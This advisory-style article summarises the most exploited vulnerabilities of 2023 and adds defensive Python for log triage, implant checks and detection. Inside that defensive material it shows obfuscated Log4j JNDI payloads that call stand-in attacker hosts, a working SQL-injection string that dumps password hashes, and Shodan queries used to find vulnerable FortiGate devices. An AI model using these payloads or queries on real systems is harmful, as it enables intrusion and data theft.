In Depth: Top Exploited Vulnerabilities
Vulnerability
November 26, 2024
In November 2024, a Joint Cybersecurity Advisory published by CISA, the FBI, and international partners detailed the vulnerabilities most routinely exploited during 2023. These flaws warrant urgent remediation because the vulnerable systems are actively targeted. While most of the vulnerabilities were disclosed in 2023, some date from 2021 and 2022, underscoring the need for more timely patching of critical vulnerabilities. The NJCCIC describes each vulnerability, its CVSS score, and its observed exploitation:
1. CVE-2023-3519
- Product(s): Citrix NetScaler ADC
- CVSS Score: 9.8 (Critical)
- Description: Allows an unauthenticated remote attacker to execute code on a vulnerable NetScaler ADC or NetScaler Gateway appliance by supplying crafted input that alters the intended control flow of the application (code injection).
- Exploitation:
- In mid-2023, CISA observed threat actors exploiting CVE-2023-3519 to implant webshells on victim NetScaler appliances. The webshell provided root-level access on the appliance and was used to perform discovery against the victim network's Active Directory (AD).
2. CVE-2023-4966 – Citrix Bleed
- Product(s): Citrix NetScaler ADC
- CVSS Score: 9.4 (Critical)
- Description: Certain operations on NetScaler ADC and NetScaler Gateway read or write outside the intended boundary of a memory buffer. A remote unauthenticated attacker can trigger the over-read and have the appliance return adjacent memory contents, including sensitive session data.
- Exploitation:
- Mandiant observed multiple incidents involving Citrix Bleed in the wild beginning in late August 2023. In these intrusions, threat actors took over legitimate user sessions, bypassing both passwords and multi-factor authentication (MFA). Mandiant researchers found that an HTTP GET request carrying a Host header longer than a certain length caused the vulnerable NetScaler to return system memory contents, including valid session cookies that pass the appliance's authentication checks when replayed.
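The session-hijack pattern described above, as an added detection example (not code from the advisory, Citrix, or Mandiant): it reads constructed JSON-line web-log records and flags two things, the exploit shape itself (a GET to the OpenID configuration endpoint used by the public proof of concept with a Host header far longer than any legitimate one) and a session cookie presented from more than one source IP, which is what a replayed leaked cookie looks like. The field names, the `host_len` field (which assumes a reverse proxy, WAF, or packet capture in front of the appliance records the Host header length; the appliance's own logs do not) and the 1024-byte threshold are assumptions.

```python
import json
from collections import defaultdict

# Constructed sample log records (JSON lines), not real NetScaler logs.
# Addresses come from documentation ranges; cookie values are made up.
SAMPLE_LOG = """
{"ts": "2023-10-10T08:00:01Z", "src": "203.0.113.10", "method": "GET", "path": "/oauth/idp/.well-known/openid-configuration", "host_len": 24812, "status": 200, "session": null}
{"ts": "2023-10-10T08:00:05Z", "src": "198.51.100.7", "method": "GET", "path": "/vpn/index.html", "host_len": 21, "status": 200, "session": "7c4a8d09ca3762af61e59520943dc264"}
{"ts": "2023-10-10T08:00:09Z", "src": "203.0.113.10", "method": "GET", "path": "/vpn/index.html", "host_len": 21, "status": 200, "session": "7c4a8d09ca3762af61e59520943dc264"}
{"ts": "2023-10-10T08:01:00Z", "src": "192.0.2.44", "method": "GET", "path": "/oauth/idp/.well-known/openid-configuration", "host_len": 21, "status": 200, "session": null}
{"ts": "2023-10-10T08:02:00Z", "src": "198.51.100.8", "method": "GET", "path": "/vpn/index.html", "host_len": 21, "status": 200, "session": "0f1e2d3c4b5a69788796a5b4c3d2e1f0"}
"""

OPENID_ENDPOINT = "/oauth/idp/.well-known/openid-configuration"
HOST_LEN_LIMIT = 1024  # assumed threshold: legitimate Host headers are a few dozen bytes


def parse_log(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_overread_probes(records):
    """Requests matching the exploit shape: GET to the OpenID configuration
    endpoint with an oversized Host header."""
    return [r for r in records
            if r["method"] == "GET" and r["path"] == OPENID_ENDPOINT
            and r["host_len"] > HOST_LEN_LIMIT]


def find_session_reuse(records):
    """Session cookies presented from more than one source IP. A leaked cookie
    replayed by the attacker appears as a second IP on a session that never
    re-authenticated."""
    ips_by_session = defaultdict(set)
    for r in records:
        if r.get("session"):
            ips_by_session[r["session"]].add(r["src"])
    return {s: sorted(ips) for s, ips in ips_by_session.items() if len(ips) > 1}


def triage(text):
    """Correlate the two signals: a reused session is high confidence when one
    of the IPs using it also sent an over-read probe."""
    records = parse_log(text)
    probes = find_overread_probes(records)
    reuse = find_session_reuse(records)
    probe_ips = {p["src"] for p in probes}
    hijacked = {s: ips for s, ips in reuse.items() if probe_ips & set(ips)}
    return {"probes": probes, "reused_sessions": reuse, "likely_hijacked": hijacked}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for session, ips in result["likely_hijacked"].items():
        print(f"likely hijacked session {session[:8]}... seen from {ips}")
```

Session reuse across IPs on its own produces false positives for roaming and mobile users; the correlation with a probe from the same address is what raises confidence. Because the leaked cookie stays valid until the session expires, patching alone is not enough: active sessions must be terminated after the upgrade.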
3. CVE-2023-20198
- Product(s): Cisco IOS XE Software
- CVSS Score: 10.0 (Critical)
- Description: Through an unprotected alternate channel, a remote unauthenticated attacker can create an account with privilege level 15 (full administrator) via the web UI of Cisco IOS XE, the Linux-based Internetwork Operating System that runs on many Cisco routers and switches.
- Exploitation:
- In October 2023, Cisco Talos Incident Response observed CVE-2023-20198 being exploited to create a privileged local user account, followed by delivery of a malicious implant that becomes active once the device's web server is restarted. A device reboot removes the implant, but the administrator account created through the vulnerability persists on the system. Cisco Talos tracks the implant as "BadCandy"; it was saved under the file path /usr/binos/conf/nginx-conf/cisco_service.conf.
4. CVE-2023-20273
- Product(s): Cisco IOS XE Software
- CVSS Score: 7.2 (High)
- Description: A vulnerability in the web UI feature of Cisco IOS XE software could allow an authenticated, remote attacker to inject commands that execute with root privileges, due to insufficient input validation. In observed attacks the authentication requirement was satisfied with the administrator account created via CVE-2023-20198.
- Exploitation:
- Cisco Talos Incident Response noted that CVE-2023-20273 was used in succession with CVE-2023-20198: the newly established administrator account was used to inject commands with root privileges, achieving remote code execution on the target device and writing the implant to disk.
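Two checks that follow from the two Cisco items above, as an added example (not Cisco's or Talos's code): the first implements the implant probe Cisco Talos published, a POST to `/webui/logoutconfirm.html?logon_hash=1` that the BadCandy implant answers with a bare hexadecimal string; the second audits a `show running-config` excerpt for the part of the intrusion that survives a reboot, a privilege-15 local user nobody created, and for the exposure condition, the HTTP/HTTPS server being enabled. The sample config is constructed; `netops` is a made-up expected admin, `cisco_tac_admin` is one of the account names Talos reported, and the live probe function is provided but not executed here.

```python
import re
import ssl
import urllib.request

# Talos' published check: a device running the BadCandy implant answers this
# POST with a bare hexadecimal string; a clean device returns web UI HTML
# (or nothing at all if the web UI is disabled).
IMPLANT_CHECK_PATH = "/webui/logoutconfirm.html?logon_hash=1"
HEX_ONLY = re.compile(r"\A[0-9a-fA-F]{8,}\Z")


def implant_indicated(body: str) -> bool:
    """True when the response body consists of nothing but a hex string."""
    return HEX_ONLY.match(body.strip()) is not None


def probe_device(host: str, timeout: float = 5.0) -> bool:
    """Live, unauthenticated probe (not run by this example). Certificate
    checks are disabled because IOS XE web UIs usually carry self-signed
    certificates; adjust to your policy."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(f"https://{host}{IMPLANT_CHECK_PATH}", data=b"", method="POST")
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return implant_indicated(resp.read().decode("utf-8", "replace"))


# Running-config audit: the backdoor account outlives the reboot that removes
# the implant, so look for privilege-15 users that are not on your list.
USER_LINE = re.compile(r"^username\s+(\S+)\s+privilege\s+(\d+)", re.M)
HTTP_SERVER = re.compile(r"^ip http (?:secure-)?server\b", re.M)  # "no ip http server" does not match


def audit_running_config(config: str, expected_admins: set) -> list:
    findings = []
    if HTTP_SERVER.search(config):
        findings.append("web UI enabled (ip http server / ip http secure-server)")
    for name, priv in USER_LINE.findall(config):
        if int(priv) >= 15 and name not in expected_admins:
            findings.append(f"unexpected privilege-{priv} user: {name}")
    return findings


# Constructed 'show running-config' excerpt (hashes redacted).
SAMPLE_CONFIG = """\
hostname edge-rtr-01
username netops privilege 15 secret 9 $9$REDACTED
username cisco_tac_admin privilege 15 secret 9 $9$REDACTED
username readonly privilege 1 secret 9 $9$REDACTED
ip http server
ip http secure-server
"""

if __name__ == "__main__":
    for finding in audit_running_config(SAMPLE_CONFIG, {"netops"}):
        print(finding)
```

A negative probe result is not proof of a clean device: later implant variants only answer when an additional header is present, so pair the network check with the config audit and with Cisco's own guidance.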
5. CVE-2023-27997
- Product(s): Fortinet FortiOS-6K7K
- CVSS Score: 9.2 (Critical)
- Description: A heap-based buffer overflow in the SSL-VPN component of FortiOS and FortiProxy allows a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.
- Exploitation:
- The vulnerability may have been exploited by threat actors in attacks against government, manufacturing, and critical infrastructure organizations. While the China-based threat actor Volt Typhoon has not been confirmed to use this vulnerability, Fortinet has noted that the group could plausibly exploit it. The following Shodan searches have been used by threat actors to locate potentially vulnerable devices:
- ssl.cert.subject.cn:FortiGate
- http.html_hash:-1454941180
6. CVE-2023-34362
- Product(s): Progress MOVEit
- CVSS Score: 9.8 (Critical)
- Description: A SQL injection vulnerability in the MOVEit Transfer web application can allow an unauthenticated attacker to gain access to the application's database. The root cause is improper neutralization of special characters in user-supplied input that the software uses to build SQL queries.
- Exploitation:
- According to CISA reporting, the MOVEit vulnerability was exploited by the CL0P ransomware gang, which deployed the LEMURLOOT webshell to steal data from MOVEit Transfer databases. At least 121 organizations are estimated to have been compromised by CL0P through this vulnerability, affecting an estimated 15 million individuals.
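The weakness class behind the MOVEit item, shown as an added example rather than MOVEit's own code or schema: a generic lookup built by string concatenation beside its parameterized replacement, run against a constructed in-memory SQLite table. The injected value closes the string literal, appends a UNION that pulls a column the query never exposed, and comments out the trailing quote; the parameterized form treats the same value as data and returns nothing.

```python
import sqlite3


def build_db():
    """Constructed stand-in for an application database (not MOVEit's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, email TEXT, pw_hash TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", "sha256$deadbeef"),
        ("bob", "bob@example.com", "sha256$cafef00d"),
    ])
    return con


def lookup_vulnerable(con, username):
    """String-built query: quotes and comment markers in the input are not
    neutralized, so the input rewrites the statement itself."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, username):
    """Parameterized query: the driver passes the value out of band, so it is
    compared as data whatever characters it contains."""
    return con.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


# Attacker-controlled value. Resulting statement in the vulnerable path:
# SELECT username, email FROM users WHERE username = '' UNION SELECT username, pw_hash FROM users --'
INJECTION = "' UNION SELECT username, pw_hash FROM users --"


def demo():
    con = build_db()
    return {
        "vulnerable": lookup_vulnerable(con, INJECTION),  # every user's hash
        "safe": lookup_safe(con, INJECTION),               # no such username
        "legit": lookup_safe(con, "alice"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

Parameterization is the fix; blocklisting quote characters is not, since encodings and second-order injection routinely get around it.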
7. CVE-2023-22515
- Product(s): Atlassian Confluence Data Center, Confluence Server
- CVSS Score: 10.0 (Critical)
- Description: Improper input validation leads to broken access control, allowing a remote unauthenticated attacker to create unauthorized Confluence administrator accounts and thereby access the affected Confluence instance.
- Exploitation:
- The FBI observed multiple IP addresses exfiltrating data from organizations exposed by the vulnerability. Additionally, the following User-Agent strings were present in the request headers used by multiple threat actors:
- Python-requests/2.27.1
- curl/7.88.1
8. CVE-2021-44228 – Log4j
- Product(s): Apache Log4j2
- CVSS Score: 10.0 (Critical)
- Description: In affected versions of Apache Log4j 2, the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from an attacker-controlled LDAP server when message lookup substitution is enabled. The weakness is compounded by uncontrolled resource consumption and improper input validation.
- Exploitation:
- Threat actors have routinely exploited Log4j in the wild since its disclosure in December 2021. Any attacker-controlled string that ends up being logged (a User-Agent header, a form field, a username) and contains a JNDI lookup such as ${jndi:ldap://<attacker-host>/...} causes the vulnerable logger to contact the attacker's LDAP server and load code from it. In many successful exploitation cases, victims were infected with a variety of payloads, including cryptocurrency-mining malware and botnet agents.
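A log-scanning detector for the lookup strings described above, added here as an example and not taken from the advisory or from Apache. The point it makes beyond the text: a signature for the literal `${jndi:` is trivially evaded, because Log4j resolves nested lookups such as `${lower:j}` and `${::-j}` before the outer JNDI lookup, so the detector collapses those inner lookups first and only then matches the scheme. The log lines are constructed (documentation addresses), and the list of schemes is the common set seen in attacks, not an exhaustive one.

```python
import re

# Inner lookups Log4j resolves before the outer ${jndi:...}; attackers use
# them to hide the literal string "jndi" from naive signatures.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)  # ${lower:J} -> J
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")            # ${::-j}, ${env:X:-j} -> j
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?):", re.I)


def normalize(value, max_rounds=8):
    """Collapse nested case/default lookups, innermost first, until stable."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(lambda m: m.group(1), value)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def find_jndi(line):
    """Return the JNDI scheme if the de-obfuscated line carries a lookup."""
    m = JNDI_LOOKUP.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """(line number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed access-log lines, not captured traffic.
SAMPLE_LINES = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.6 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.6:1389/a}"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${upper:l}dap://203.0.113.7/x}"',
    '203.0.113.8 - - "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.8/o} HTTP/1.1" 404 "-" "curl/7.88.1"',
    '203.0.113.9 - - "GET /price?value=${not:a:lookup} HTTP/1.1" 200 "-" "-"',
]

if __name__ == "__main__":
    for lineno, scheme in scan(SAMPLE_LINES):
        print(f"line {lineno}: JNDI lookup via {scheme}")
```

Regex normalization covers the obfuscations seen in mass exploitation but is not a full Log4j lookup parser; URL-encoded or split payloads need decoding before the scan, and the authoritative fix remains upgrading Log4j rather than filtering input.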
9. CVE-2023-2868
- Product(s): Barracuda Email Security Gateway
- CVSS Score: 9.4 (Critical)
- Description: A remote command injection vulnerability exists because the processing of user-supplied .tar email attachments does not fully sanitize the archive contents. Input validation of the file names contained in the .tar is incomplete, so a remote attacker can craft those file names in a way that results in a system command being executed through Perl's qx operator with the privileges of the Email Security Gateway product.
- Exploitation:
- Mandiant observed a China-nexus threat actor exploiting the vulnerability across a range of sectors in espionage campaigns supporting the interests of the People's Republic of China. The actor sent phishing emails to target organizations with malicious .tar attachments that exploited the vulnerability for initial access.
10. CVE-2022-47966
- Product(s): ServiceDesk Plus, Access Manager Plus, Active Directory 360, ADAudit Plus, ADManager Plus, ADSelfService Plus, Analytics Plus, Application Control Plus, Asset Explorer, Browser Security Plus, Device Control Plus, Endpoint Central, Endpoint Central MSP, Endpoint DLP, Key Manager Plus, OS Deployer, PAM 360, Password Manager Pro, Patch Manager Plus, Remote Access Plus, Remote Monitoring and Management (RMM), ServiceDesk Plus MSP, SupportCenter Plus, Vulnerability Manager Plus
- CVSS Score: 9.8 (Critical)
- Description: Multiple Zoho ManageEngine on-premise products allow an unauthenticated remote attacker to execute code because they use an outdated, vulnerable version of Apache Santuario xmlsec (XML Security for Java). Exploitation is only possible if SAML SSO is, or previously was, enabled on the product. The underlying weakness is improper input validation of the SAML response.
- Exploitation:
- CISA observed nation-state actors exploiting the vulnerability to gain unauthorized access to organizations in the aerospace sector, likely for espionage. Nation-state actors also frequently exploited it in tandem with CVE-2022-42475 (a FortiOS SSL-VPN heap-based buffer overflow).
Recommendations:
- Organizations using the affected products should maintain prompt patch management and update the affected products to their most recent stable releases.
- If affected versions of these products were in use, logs should be reviewed for signs of past or ongoing exploitation, using the exploitation details above (implanted files, unexpected administrator accounts, anomalous request headers and User-Agent strings) as a starting point.
- Security awareness training should cover the fact that threat actors target specific products, so that staff recognize which parts of the organization's attack surface are being actively exploited.